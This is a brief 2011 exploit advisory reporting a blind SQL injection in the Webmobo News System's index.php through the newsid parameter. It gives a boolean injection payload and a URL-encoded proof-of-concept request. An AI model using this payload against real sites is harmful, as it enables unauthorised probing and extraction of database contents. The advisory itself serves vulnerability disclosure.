# Exploit Title: Webmobo News System Blind SQL Injection# Date: 2011# Author: Eyup CELIK# Version: All Version# Tested on: All versions are Vulnerability# Web Site: www.eyupcelik.com.tr
ISSUE
Blind SQL Injection can be done using the command input
Vulnerable Page:
index.php
Example:
index.php?action=sendto&newsid=<Blind SQL Injection Code>
Exploit:
index.php?action=sendto&newsid=1' and '2'='2
POC:
http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr